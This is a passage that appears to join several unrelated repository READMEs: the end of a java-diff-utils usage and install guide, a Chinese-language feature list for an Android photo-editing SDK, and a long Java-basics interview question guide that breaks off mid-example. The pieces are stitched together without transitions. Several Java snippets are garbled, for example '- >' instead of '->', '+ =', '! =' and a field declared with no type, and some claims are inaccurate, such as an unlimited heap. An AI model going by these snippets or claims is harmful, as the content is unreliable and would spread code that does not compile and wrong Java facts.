second line.", "And here is the finish."), Arrays.asList("This is a test for diffutils.", "This is the second line.")); System.out.println("|original|new|"); System.out.println("|--------|---|"); for (DiffRow row : rows) { System.out.println("|" + row.getOldLine() + "|" + row.getNewLine() + "|"); } ``` |original|new| |--------|---| |This is a test ~senctence~.|This is a test **for diffutils**.| |This is the second line.|This is the second line.| |~And here is the finish.~|| ## Main Features * computing the difference between two texts. * capable to hand more than plain ascii. Arrays or List of any type that implements hashCode() and equals() correctly can be subject to differencing using this library * patch and unpatch the text with the given patch * parsing the unified diff format * producing human-readable differences * inline difference construction * Algorithms: * Myers Standard Algorithm * Myers with linear space improvement * HistogramDiff using JGit Library ### Algorithms * Myer's diff * HistogramDiff But it can easily replaced by any other which is better for handing your texts. I have plan to add implementation of some in future. ## Source Code conventions Recently a checkstyle process was integrated into the build process. java-diff-utils follows the sun java format convention. There are no TABs allowed. Use spaces. ```java public static <T> Patch<T> diff(List<T> original, List<T> revised, BiPredicate<T, T> equalizer) throws DiffException { if (equalizer != null) { return DiffUtils.diff(original, revised, new MyersDiff<>(equalizer)); } return DiffUtils.diff(original, revised, new MyersDiff<>()); } ``` This is a valid piece of source code: * blocks without braces are not allowed * after control statements (if, while, for) a whitespace is expected * the opening brace should be in the same line as the control statement ### To Install Just add the code below to your maven dependencies: ```xml <dependency> <groupId>io.github.java-diff-utils</groupId> <artifactId>java-diff-utils</artifactId> <version>4.12</version> </dependency> ``` or using gradle: ```groovy // https://mvnrepository.com/artifact/io.github.java-diff-utils/java-diff-utils implementation "io.github.java-diff-utils:java-diff-utils:4.12" ```
1,图片编辑(图片添加,文字添加),实现图片编辑中的图片添加,旋转,缩放,删除;文字的添加,大小缩放,字体更换,颜色更换,删除; 2,基本滤镜实现与接口封装; 涂鸦(画笔的样式,粗细,颜色,橡皮擦,贴图); 相框(简单相框,酷炫相框); 马赛就克(基本马赛克,酷炫马赛克,橡皮擦)及其接口封装 3,接下来, 图像剪切,旋转等功能实现测试接口封装; GIF与MP4,图片互转实现测试与接口封装;
# 图片处理sdk(just for eclipse) Note: 新的项目(for studio)转移到https://github.com/jarlen/PhotoEdit (包括jni本地源码) - cn.ffmpeg - gif mp4 互转 - com.js.photosdk.bodywarp - 图片变形 - com.js.photosdk.crop - 图片剪切 - 借用 library [cropper](https://github.com/edmodo/cropper) - com.js.photosdk.enhance - 图片增强,对比度,饱和度,亮度 - com.js.photosdk.filter - 滤镜 - 借用 library [android-gpuimage](https://github.com/CyberAgent/android-gpuimage) - com.js.photosdk.mosaic - 马赛克 - com.js.photosdk.operate - 图片添加水印,添加文字 - com.js.photosdk.photoframe - 添加相框 - com.js.photosdk.scrawl - 涂鸦 - com.js.photosdk.utils - 工具类 - jp.co.cyberagent.android.gpuimage - 滤镜 library - jp.co.cyberagent.android.gpuimage.util - 滤镜 library
Java Basics ( Java-8 )
collections design-pattern hibernate java java-programs java8 jdbc jsp multithreading servlet
# Java Basics > *Click &#9733; if you like the project. Your contributions are heartily ♡ welcome.* <br/> ## Related Topics * *[Multithreading](multithreading-questions.md)* * *[Collections](collections-questions.md)* * *[Java Database Connectivity (JDBC)](JDBC-questions.md)* * *[Java Programs](java-programs.md)* * *[Java String Methods](java-string-methods.md)* * *[Jakarta Server Pages (JSP)](jsp-questions.md)* * *[Servlets](servlets-questions.md)* * *[Java Multiple Choice Questions](java-multiple-choice-questions-answers.md)* * *[Java Design Pattern](https://github.com/learning-zone/java-design-patterns)* * *[Hibernate](https://github.com/learning-zone/hibernate-basics)* * *[Spring Framework Basics](https://github.com/learning-zone/spring-basics)* <br/> ## Table of Contents * [Introduction](#-1-introduction) * [Java Architecture](#-2-java-architecture) * [Java Data Types](#-3-java-data-types) * [Java Methods](#-4-java-methods) * [Java Functional programming](#-5-java-functional-programming) * [Java Lambda expressions](#-6-java-lambda-expressions) * [Java Classes](#-7-java-classes) * [Java Constructors](#-8-java-constructors) * [Java Array](#-9-java-array) * [Java Strings](#-10-java-strings) * [Java Reflection](#-11-java-reflection) * [Java Streams](#-12-java-streams) * [Java Regular Expressions](#-13-java-regular-expressions) * [Java File Handling](#-14-java-file-handling) * [Java Exceptions](#-15-java-exceptions) * [Java Inheritance](#-16-java-inheritance) * [Java Method Overriding](#-17-java-method-overriding) * [Java Polymorphism](#-18-java-polymorphism) * [Java Abstraction](#-19-java-abstraction) * [Java Interfaces](#-20-java-interfaces) * [Java Encapsulation](#-21-java-encapsulation) * [Java Generics](#-22-java-generics) * [Miscellaneous](#-23-miscellaneous) <br/> ## # 1. INTRODUCTION <br/> ## Q. What are the important features of Java 8 release? * Interface methods by default; * Lambda expressions; * Functional interfaces; * References to methods and constructors; * Repeatable annotations * Annotations on data types; * Reflection for method parameters; * Stream API for working with collections; * Parallel sorting of arrays; * New API for working with dates and times; * New JavaScript Nashorn Engine ; * Added several new classes for thread safe operation; * Added a new API for `Calendar`and `Locale`; * Added support for Unicode 6.2.0 ; * Added a standard class for working with Base64 ; * Added support for unsigned arithmetic; * Improved constructor `java.lang.String(byte[], *)` and method performance `java.lang.String.getBytes()`; * A new implementation `AccessController.doPrivileged` that allows you to set a subset of privileges without having to check all * other access levels; * Password-based algorithms have become more robust; * Added support for SSL / TLS Server Name Indication (NSI) in JSSE Server ; * Improved keystore (KeyStore); * Added SHA-224 algorithm; * Removed JDBC Bridge - ODBC; * PermGen is removed , the method for storing meta-data of classes is changed; * Ability to create profiles for the Java SE platform, which include not the entire platform, but some part of it; * Tools * Added utility `jjs` for using JavaScript Nashorn; * The command `java` can run JavaFX applications; * Added utility `jdeps` for analyzing .class files. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is Nashorn? **Nashorn** is a JavaScript engine developed in Java by Oracle. Designed to provide the ability to embed JavaScript code in Java applications. Compared to Rhino , which is supported by the Mozilla Foundation, Nashorn provides 2 to 10 times better performance, as it compiles code and transfers bytecode to the Java virtual machine directly in memory. Nashorn can compile JavaScript code and generate Java classes that are loaded with a special loader. It is also possible to call Java code directly from JavaScript. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is jjs? `jjs` - This is a command line utility that allows you to execute JavaScript programs directly in the console. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. In Java, How many ways you can take input from the console? In Java, there are three different ways for reading input from the user in the command line environment ( console ). **1. Using Buffered Reader Class:** This method is used by wrapping the System.in ( standard input stream ) in an InputStreamReader which is wrapped in a BufferedReader, we can read input from the user in the command line. ```java /** * Buffered Reader Class */ import java.io.BufferedReader; import java.io.IOException; import java.io.InputStreamReader; public class Test { public static void main(String[] args) throws IOException { // Enter data using BufferReader BufferedReader reader = new BufferedReader(new InputStreamReader(System.in)); // Reading data using readLine String name = reader.readLine(); // Printing the read line System.out.println(name); } } ``` **2. Using Scanner Class:** The main purpose of the Scanner class is to parse primitive types and strings using regular expressions, however it is also can be used to read input from the user in the command line. ```java /** * Scanner Class */ import java.util.Scanner; class GetInputFromUser { public static void main(String args[]) { // Using Scanner for Getting Input from User Scanner in = new Scanner(System.in); String s = in.nextLine(); System.out.println("You entered string " + s); int a = in.nextInt(); System.out.println("You entered integer " + a); float b = in.nextFloat(); System.out.println("You entered float " + b); } } ``` **3. Using Console Class:** It has been becoming a preferred way for reading user\'s input from the command line. In addition, it can be used for reading password-like input without echoing the characters entered by the user; the format string syntax can also be used ( like System.out.printf() ). ```java /** * Console Class */ public class Sample { public static void main(String[] args) { // Using Console to input data from user String name = System.console().readLine(); System.out.println(name); } } ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is the purpose of using javap? The **javap** command displays information about the fields, constructors and methods present in a class file. The javap command ( also known as the Java Disassembler ) disassembles one or more class files. ```java /** * Java Disassembler */ class Simple { public static void main(String args[]) { System.out.println("Hello World"); } } ``` ```cmd cmd> javap Simple.class ``` Output ```java Compiled from ".java" class Simple { Simple(); public static void main(java.lang.String[]); } ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. Explain the expression `System.out::println`? The specified expression illustrates passing a reference to a static method of a `println()`class `System.out`. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. Tell us about parallel processing in Java 8? Streams can be sequential and parallel. Operations on sequential streams are performed in one processor thread, on parallel streams - using several processor threads. Parallel streams use the shared stream `ForkJoinPool`through the static `ForkJoinPool.commonPool()`method. In this case, if the environment is not multi-core, then the stream will be executed as sequential. In fact, the use of parallel streams is reduced to the fact that the data in the streams will be divided into parts, each part is processed on a separate processor core, and in the end these parts are connected, and final operations are performed on them. You can also use the `parallelStream()`interface method to create a parallel stream from the collection `Collection`. To make a regular sequential stream parallel, you must call the `Stream`method on the object `parallel()`. The method `isParallel()`allows you to find out if the stream is parallel. Using, methods `parallel()`and `sequential()`it is possible to determine which operations can be parallel, and which only sequential. You can also make a parallel stream from any sequential stream and vice versa: ```java collection .stream () .peek ( ... ) // operation is sequential .parallel () .map ( ... ) // the operation can be performed in parallel, .sequential () .reduce ( ... ) // operation is sequential again ``` As a rule, elements are transferred to the stream in the same order in which they are defined in the data source. When working with parallel streams, the system preserves the sequence of elements. An exception is a method `forEach()`that can output elements in random order. And in order to maintain the order, it is necessary to apply the method `forEachOrdered()`. * Criteria that may affect performance in parallel streams: * Data size - the more data, the more difficult it is to separate the data first, and then combine them. * The number of processor cores. Theoretically, the more cores in a computer, the faster the program will work. If the machine has one core, it makes no sense to use parallel threads. * The simpler the data structure the stream works with, the faster operations will occur. For example, data from is `ArrayList`easy to use, since the structure of this collection assumes a sequence of unrelated data. But a type collection `LinkedList`is not the best option, since in a sequential list all the elements are connected with previous / next. And such data is difficult to parallelize. * Operations with primitive types will be faster than with class objects. * It is highly recommended that you do not use parallel streams for any long operations (for example, network connections), since all parallel streams work with one `ForkJoinPool`, such long operations can stop all parallel streams in the JVM due to the lack of available threads in the pool, etc. e. parallel streams should be used only for short operations where the count goes for milliseconds, but not for those where the count can go for seconds and minutes; * Saving order in parallel streams increases execution costs, and if order is not important, it is possible to disable its saving and thereby increase productivity by using an intermediate operation `unordered()`: ```java collection.parallelStream () .sorted () .unordered () .collect ( Collectors . toList ()); ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## # 2. JAVA ARCHITECTURE <br/> ## Q. What is JVM and is it platform independent? Java Virtual Machine (JVM) is a specification that provides runtime environment in which java bytecode(.class files) can be executed. The JVM is the platform. The JVM acts as a "virtual" machine or processor. Java\'s platform independence consists mostly of its Java Virtual Machine (JVM). JVM makes this possible because it is aware of the specific instruction lengths and other particularities of the platform (Operating System). The JVM is not platform independent. Java Virtual Machine (JVM) provides the environment to execute the java file(. Class file). So at the end it's depends on kernel and kernel is differ from OS (Operating System) to OS. The JVM is used to both translate the bytecode into the machine language for a particular computer and actually execute the corresponding machine-language instructions as well. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is JIT compiler in Java? The Just-In-Time (JIT) compiler is a component of the runtime environment that improves the performance of Java applications by compiling bytecodes to native machine code at run time. Java programs consists of classes, which contain platform-neutral bytecodes that can be interpreted by a JVM on many different computer architectures. At run time, the JVM loads the class files, determines the semantics of each individual bytecode, and performs the appropriate computation. The additional processor and memory usage during interpretation means that a Java application performs more slowly than a native application. The JIT compiler helps improve the performance of Java programs by compiling bytecodes into native machine code at run time. The JIT compiler is enabled by default. When a method has been compiled, the JVM calls the compiled code of that method directly instead of interpreting it. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is Classloader in Java? The **Java ClassLoader** is a part of the Java Runtime Environment that dynamically loads Java classes into the Java Virtual Machine. Java code is compiled into class file by javac compiler and JVM executes Java program, by executing byte codes written in class file. ClassLoader is responsible for loading class files from file system, network or any other source. **Types of ClassLoader:** **1. Bootstrap Class Loader**: It loads standard JDK class files from rt.jar and other core classes. It loads class files from jre/lib/rt.jar. For example, java.lang package class. **2. Extensions Class Loader**: It loads classes from the JDK extensions directly usually `JAVA_HOME/lib/ext` directory or any other directory as java.ext.dirs. **3. System Class Loader**: It loads application specific classes from the CLASSPATH environment variable. It can be set while invoking program using -cp or classpath command line options. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. Java Compiler is stored in JDK, JRE or JVM? **1. JDK**: Java Development Kit is the core component of Java Environment and provides all the tools, executables and binaries required to compile, debug and execute a Java Program. **2. JVM**: JVM is responsible for converting Byte code to the machine specific code. JVM is also platform dependent and provides core java functions like memory management, garbage collection, security etc. JVM is customizable and we can use java options to customize it, for example allocating minimum and maximum memory to JVM. JVM is called virtual because it provides an interface that does not depend on the underlying operating system and machine hardware. **2. JRE**: Java Runtime Environment provides a platform to execute java programs. JRE consists of JVM and java binaries and other classes to execute any program successfully. <p align="center"> <img src="assets/jdk.jpg" alt="Java Compiler" width="500px" /> </p> <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is difference between Heap and Stack Memory in java? **1. Java Heap Space:** Java Heap space is used by java runtime to allocate memory to **Objects** and **JRE classes**. Whenever we create any object, it\'s always created in the Heap space. Garbage Collection runs on the heap memory to free the memory used by objects that doesn\'t have any reference. Any object created in the heap space has global access and can be referenced from anywhere of the application. **2. Java Stack Memory:** Stack in java is a section of memory which contains **methods**, **local variables** and **reference variables**. Local variables are created in the stack. Stack memory is always referenced in LIFO ( Last-In-First-Out ) order. Whenever a method is invoked, a new block is created in the stack memory for the method to hold local primitive values and reference to other objects in the method. As soon as method ends, the block becomes unused and become available for next method. Stack memory size is very less compared to Heap memory. **Difference:** |Parameter |Stack Memory |Heap Space | |------------------|-----------------------------|-----------------------------------| |Application |Stack is used in parts, one at a time during execution of a thread| The entire application uses Heap space during runtime| |Size |Stack has size limits depending upon OS and is usually smaller then Heap|There is no size limit on Heap| |Storage |Stores only primitive variables and references to objects that are created in Heap Space|All the newly created objects are stored here| |Order |It is accessed using Last-in First-out (LIFO) memory allocation system| This memory is accessed via complex memory management techniques that include Young Generation, Old or Tenured Generation, and Permanent Generation.| |Life |Stack memory only exists as long as the current method is running|Heap space exists as long as the application runs| |Efficiency |Comparatively much faster to allocate when compared to heap| Slower to allocate when compared to stack| |Allocation/Deallocation| This Memory is automatically allocated and deallocated when a method is called and returned respectively|Heap space is allocated when new objects are created and deallocated by Gargabe Collector when they are no longer referenced | <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. How many types of memory areas are allocated by JVM? JVM is a program which takes Java bytecode and converts the byte code (line by line) into machine understandable code. JVM perform some particular types of operations: * Loading of code * Verification of code * Executing the code * It provide run-time environment to the users **Types of Memory areas allocated by the JVM:** **1. Classloader**: Classloader is a subsystem of JVM that is used to load class files. **2. Class(Method) Area**: Class(Method) Area stores per-class structures such as the runtime constant pool, field and method data, the code for methods. **3. Heap**: It is the runtime data area in which objects are allocated. **4. Stack**: Java Stack stores frames.It holds local variables and partial results, and plays a part in method invocation and return. Each thread has a private JVM stack, created at the same time as thread. **5. Program Counter Register**: PC (program counter) register. It contains the address of the Java virtual machine instruction currently being executed. **6. Native Method Stack**: It contains all the native methods used in the application. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## # 3. JAVA DATA TYPES <br/> ## Q. What are autoboxing and unboxing? The automatic conversion of primitive data types into its equivalent Wrapper type is known as boxing and opposite operation is known as unboxing. **Example:** Autoboxing ```java /** * Autoboxing */ class BoxingExample { public static void main(String args[]) { int a = 50; Integer a2 = new Integer(a); // Boxing Integer a3 = 5; // Boxing System.out.println(a2 + " " + a3); } } ``` **Example:** Unboxing ```java /** * Unboxing */ class UnboxingExample { public static void main(String args[]) { Integer i = new Integer(50); int a = i; System.out.println(a); } } ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is the difference between transient and volatile variable in Java? **1. Transient:** The transient modifier tells the Java object serialization subsystem to exclude the field when serializing an instance of the class. When the object is then deserialized, the field will be initialized to the default value; i.e. null for a reference type, and zero or false for a primitive type. **Example:** ```java /** * Transient */ public transient int limit = 55; // will not persist public int b; // will persist ``` **2. Volatile:** The volatile modifier tells the JVM that writes to the field should always be synchronously flushed to memory, and that reads of the field should always read from memory. This means that fields marked as volatile can be safely accessed and updated in a multi-thread application without using native or standard library-based synchronization. **Example:** ```java /** * Volatile */ public class MyRunnable implements Runnable { private volatile boolean active; public void run() { active = true; while (active) { } } public void stop() { active = false; } } ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What are assertions in Java? An assertion allows testing the correctness of any assumptions that have been made in the program. Assertion is achieved using the assert statement in Java. While executing assertion, it is believed to be true. If it fails, JVM throws an error named `AssertionError`. It is mainly used for testing purposes during development. The assert statement is used with a Boolean expression and can be written in two different ways. ```java // First way assert expression; // Second way assert expression1 : expression2; ``` **Example:** ```java /** * Assertions */ public class Example { public static void main(String[] args) { int age = 14; assert age <= 18 : "Cannot Vote"; System.out.println("The voter's age is " + age); } } ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is the final variable, final class, and final blank variable? **1. Final Variable:** Final variables are nothing but constants. We cannot change the value of a final variable once it is initialized. **Example:** ```java /** * Final Variable */ class Demo { final int MAX_VALUE = 99; void myMethod() { MAX_VALUE = 101; } public static void main(String args[]) { Demo obj = new Demo(); obj.myMethod(); } } ``` Output ```java Exception in thread "main" java.lang.Error: Unresolved compilation problem: The final field Demo.MAX_VALUE cannot be assigned at beginnersbook.com.Demo.myMethod(Details.java:6) at beginnersbook.com.Demo.main(Details.java:10) ``` **2. Blank final variable:** A final variable that is not initialized at the time of declaration is known as blank final variable. We must initialize the blank final variable in constructor of the class otherwise it will throw a compilation error ( Error: `variable MAX_VALUE might not have been initialized` ). **Example:** ```java /** * Blank final variable */ class Demo { // Blank final variable final int MAX_VALUE; Demo() { // It must be initialized in constructor MAX_VALUE = 100; } void myMethod() { System.out.println(MAX_VALUE); } public static void main(String args[]) { Demo obj = new Demo(); obj.myMethod(); } } ``` Output ```java 100 ``` **3. Final Method:** A final method cannot be overridden. Which means even though a sub class can call the final method of parent class without any issues but it cannot override it. **Example:** ```java /** * Final Method */ class XYZ { final void demo() { System.out.println("XYZ Class Method"); } } class ABC extends XYZ { void demo() { System.out.println("ABC Class Method"); } public static void main(String args[]) { ABC obj = new ABC(); obj.demo(); } } ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is a compile time constant in Java? If a primitive type or a string is defined as a constant and the value is known at compile time, the compiler replaces the constant name everywhere in the code with its value. This is called a compile-time constant. **Compile time constant must be:** * Declared final * Primitive or String * Initialized within declaration * Initialized with constant expression They are replaced with actual values at compile time because compiler know their value up-front and also knows that it cannot be changed during run-time. ```java private final int x = 10; ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What are the different access specifiers available in java? * access specifiers/modifiers helps to restrict the scope of a class, constructor, variable, method, or data member. * There are four types of access modifiers available in java: 1. `default` – No keyword required, when a class, constructor,variable, method, or data member declared without any access specifier then it is having default access scope i.e. accessible only within the same package. 2. `private` - when declared as a private , access scope is limited within the enclosing class. 3. `protected` - when declared as protocted, access scope is limited to enclosing classes, subclasses from same package as well as other packages. 4. `public` - when declared as public, accessible everywhere in the program. ```java ... /* data member variables */ String firstName="Pradeep"; /* default scope */ protected isValid=true; /* protected scope */ private String otp="AB0392"; /* private scope */ public int id = 12334; /* public scope */ ... ... /* data member functions */ String getFirstName(){ return this.firstName; } /* default scope */ protected boolean getStatus(){this.isValid;} /* protected scope */ private void generateOtp(){ /* private scope */ this.otp = this.hashCode() << 16; }; public int getId(){ return this.id; } /* public scope */ ... .../* inner classes */ class A{} /* default scope */ protected class B{} /* protected scope */ private class C{} /* private scope */ public class D{} /* public scope */ ... ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## # 4. JAVA METHODS <br/> ## Q. Can you have virtual functions in Java? In Java, all non-static methods are by default **virtual functions**. Only methods marked with the keyword `final`, which cannot be overridden, along with `private methods`, which are not inherited, are non-virtual. **Example:** Virtual function with Interface ```java /** * The function applyBrakes() is virtual because * functions in interfaces are designed to be overridden. **/ interface Bicycle { void applyBrakes(); } class ACMEBicycle implements Bicycle { public void applyBrakes() { // Here we implement applyBrakes() System.out.println("Brakes applied"); // function } } ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is a native method? A native method is a Java method (either an instance method or a class method) whose implementation is also written in another programming language such as C/C++. Moreover, a method marked as native cannot have a body and should end with a semicolon: **Main.java:** ```java public class Main { public native int intMethod(int i); public static void main(String[] args) { System.loadLibrary("Main"); System.out.println(new Main().intMethod(2)); } } ``` **Main.c:** ```c #include <jni.h> #include "Main.h" JNIEXPORT jint JNICALL Java_Main_intMethod( JNIEnv *env, jobject obj, jint i) { return i * i; } ``` **Compile and Run:** ```java javac Main.java javah -jni Main gcc -shared -fpic -o libMain.so -I${JAVA_HOME}/include \ -I${JAVA_HOME}/include/linux Main.c java -Djava.library.path=. Main ``` Output ```java 4 ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What are the restrictions that are applied to the Java static methods? If a method is declared as static, it is a member of a class rather than belonging to the object of the class. It can be called without creating an object of the class. A static method also has the power to access static data members of the class. There are a few restrictions imposed on a static method * The static method cannot use non-static data member or invoke non-static method directly. * The `this` and `super` cannot be used in static context. * The static method can access only static type data ( static type instance variable ). * There is no need to create an object of the class to invoke the static method. * A static method cannot be overridden in a subclass **Example:** ```java /** * Static Methods */ class Parent { static void display() { System.out.println("Super class"); } } public class Example extends Parent { void display() // trying to override display() { System.out.println("Sub class"); } public static void main(String[] args) { Parent obj = new Example(); obj.display(); } } ``` This generates a compile time error. The output is as follows − ```java Example.java:10: error: display() in Example cannot override display() in Parent void display() // trying to override display() ^ overridden method is static 1 error ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is a lambda? What is the structure and features of using a lambda expression? A lambda is a set of instructions that can be separated into a separate variable and then repeatedly called in various places of the program. The basis of the lambda expression is the _lambda operator_ , which represents the arrow `->`. This operator divides the lambda expression into two parts: the left side contains a list of expression parameters, and the right actually represents the body of the lambda expression, where all actions are performed. The lambda expression is not executed by itself, but forms the implementation of the method defined in the functional interface. It is important that the functional interface should contain only one single method without implementation. ```java interface Operationable { int calculate ( int x , int y ); } public static void main ( String [] args) { Operationable operation = (x, y) - > x + y; int result = operation.calculate ( 10 , 20 ); System.out.println (result); // 30 } ``` In fact, lambda expressions are in some way a shorthand form of internal anonymous classes that were previously used in Java. * _Deferred execution lambda expressions_ - it is defined once in one place of the program, it is called if necessary, any number of times and in any place of the program. * _The parameters of the lambda expression_ must correspond in type to the parameters of the functional interface method: ```javascript operation = ( int x, int y) - > x + y; // When writing the lambda expression itself, the parameter type is allowed not to be specified: (x, y) - > x + y; // If the method does not accept any parameters, then empty brackets are written, for example: () - > 30 + 20 ; // If the method accepts only one parameter, then the brackets can be omitted: n - > n * n; ``` * Trailing lambda expressions are not required to return any value. ```java interface Printable { void print( String s ); } public static void main ( String [] args) { Printable printer = s - > System.out.println(s); printer.print("Hello, world"); } // _ Block lambda - expressions_ are surrounded by curly braces . The modular lambda - expressions can be used inside nested blocks, loops, `design the if ` ` switch statement ', create variables, and so on . d . If you block a lambda - expression must return a value, it explicitly applies `statement return statement ' : Operationable operation = ( int x, int y) - > { if (y == 0 ) { return 0 ; } else { return x / y; } }; ``` * Passing a lambda expression as a method parameter ```java interface Condition { boolean isAppropriate ( int n ); } private static int sum ( int [] numbers, Condition condition) { int result = 0 ; for ( int i : numbers) { if (condition.isAppropriate(i)) { result + = i; } } return result; } public static void main ( String [] args) { System.out.println(sum ( new int [] { 0 , 1 , 0 , 3 , 0 , 5 , 0 , 7 , 0 , 9 }, (n) - > n ! = 0 )); } ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What variables do lambda expressions have access to? Access to external scope variables from a lambda expression is very similar to access from anonymous objects. * immutable ( effectively final - not necessarily marked as final) local variables; * class fields * static variables. The default methods of the implemented functional interface are not allowed to be accessed inside the lambda expression. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is a method reference? If the method existing in the class already does everything that is necessary, then you can use the method reference mechanism (method reference) to directly pass this method. The result will be exactly the same as in the case of defining a lambda expression that calls this method. **Example:** ```java private interface Measurable { public int length(String string); } public static void main ( String [] args) { Measurable a = String::length; System.out.println(a.length("abc")); } ``` Method references are potentially more efficient than using lambda expressions. In addition, they provide the compiler with better information about the type, and if you can choose between using a reference to an existing method and using a lambda expression, you should always use a method reference. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What types of method references do you know? * on the static method; * per instance method; * to the constructor. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## # 5. JAVA FUNCTIONAL PROGRAMMING <br/> ## # 6. JAVA LAMBDA EXPRESSIONS <br/> ## # 7. JAVA CLASSES <br/> ## Q. What is difference between the Inner Class and Sub Class? Nested Inner class can access any private instance variable of outer class. Like any other instance variable, we can have access modifier private, protected, public and default modifier. **Example:** ```java /** * Inner Class */ class Outer { class Inner { public void show() { System.out.println("In a nested class method"); } } } class Main { public static void main(String[] args) { Outer.Inner in = new Outer().new Inner(); in.show(); } } ``` A subclass is class which inherits a method or methods from a superclass. **Example:** ```java /** * Sub Class */ class Car { //... } class HybridCar extends Car { //... } ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. Distinguish between static loading and dynamic class loading? **1. Static Class Loading:** Creating objects and instance using `new` keyword is known as static class loading. The retrieval of class definition and instantiation of the object is done at compile time. **Example:** ```java /** * Static Class Loading */ class TestClass { public static void main(String args[]) { TestClass tc = new TestClass(); } } ``` **2. Dynamic Class Loading:** Loading classes use `Class.forName()` method. Dynamic class loading is done when the name of the class is not known at compile time. **Example:** ```java /** * Dynamic Class Loading */ Class.forName (String className); ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is the purpose of the Runtime class and System class? **1. Runtime Class:** The **java.lang.Runtime** class is a subclass of Object class, provide access to the Java runtime system. The runtime information like memory availability, invoking the garbage collector, etc. **Example:** ```java /** * Runtime Class */ public class RuntimeTest { static class Message extends Thread { public void run() { System.out.println(" Exit"); } } public static void main(String[] args) { try { Runtime.getRuntime().addShutdownHook(new Message()); System.out.println(" Program Started..."); System.out.println(" Wait for 5 seconds..."); Thread.sleep(5000); System.out.println(" Program Ended..."); } catch (Exception e) { e.printStackTrace(); } } } ``` **2. System Class:** The purpose of the System class is to provide access to system resources. It contains accessibility to standard input, standart output, error output streams, current time in millis, terminating the application, etc. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What are the ways to instantiate the Class class? **1. Using new keyword:** ```java MyObject object = new MyObject(); ``` **2. Using Class.forName():** ```java MyObject object = (MyObject) Class.forName("subin.rnd.MyObject").newInstance(); ``` **3. Using clone():** ```java MyObject anotherObject = new MyObject(); MyObject object = (MyObject) anotherObject.clone(); ``` **4. Using object deserialization:** ```java ObjectInputStream inStream = new ObjectInputStream(anInputStream ); MyObject object = (MyObject) inStream.readObject(); ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is immutable object? Immutable objects are objects that don\'t change. A Java immutable object must have all its fields be internal, private final fields. It must not implement any setters. It needs a constructor that takes a value for every single field. **Creating an Immutable Object:** * Do not add any setter method * Declare all fields final and private * If a field is a mutable object create defensive copies of it for getter methods * If a mutable object passed to the constructor must be assigned to a field create a defensive copy of it * Don\'t allow subclasses to override methods. ```java /** * Immutable Object */ public class DateContainer { private final Date date; public DateContainer() { this.date = new Date(); } public Date getDate() { return new Date(date.getTime()); } } ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. How can we create an immutable class in Java? Immutable class means that once an object is created, we cannot change its content. In Java, all the wrapper classes (like Integer, Boolean, Byte, Short) and String class is immutable. **Rules to create immutable classes:** * The class must be declared as final * Data members in the class must be declared as final * A parameterized constructor * Getter method for all the variables in it * No setters ```java /** * Immutable Class */ public final class Employee { final String pancardNumber; public Employee(String pancardNumber) { this.pancardNumber = pancardNumber; } public String getPancardNumber() { return pancardNumber; } } ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. How bootstrap class loader works in java? Bootstrap ClassLoader is repsonsible for loading standard JDK classs files from **rt.jar** and it is parent of all class loaders in java. There are three types of built-in ClassLoader in Java: **1. Bootstrap Class Loader:** It loads JDK internal classes, typically loads rt.jar and other core classes for example java.lang.* package classes **2. Extensions Class Loader:** It loads classes from the JDK extensions directory, usually $JAVA_HOME/lib/ext directory. **3. System Class Loader:** It loads classes from the current classpath that can be set while invoking a program using -cp or -classpath command line options. ```java /** * ClassLoader */ import java.util.logging.Level; import java.util.logging.Logger; public class ClassLoaderTest { public static void main(String args[]) { try { // printing ClassLoader of this class System.out.println("ClassLoader : " + ClassLoaderTest.class.getClassLoader()); // trying to explicitly load this class again using Extension class loader Class.forName("Explicitly load class", true, ClassLoaderTest.class.getClassLoader().getParent()); } catch (ClassNotFoundException ex) { Logger.getLogger(ClassLoaderTest.class.getName()).log(Level.SEVERE, null, ex); } } } ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. How can we create a object of a class without using new operator? Different ways to create an object in Java * **Using new Keyword:** ```java class ObjectCreationExample{ String Owner; } public class MainClass { public static void main(String[] args) { // Here we are creating Object of JBT using new keyword ObjectCreationExample obj = new ObjectCreationExample(); } } ``` * **Using New Instance (Reflection)** ```java class CreateObjectClass { static int j = 10; CreateObjectClass() { i = j++; } int i; @Override public String toString() { return "Value of i :" + i; } } class MainClass { public static void main(String[] 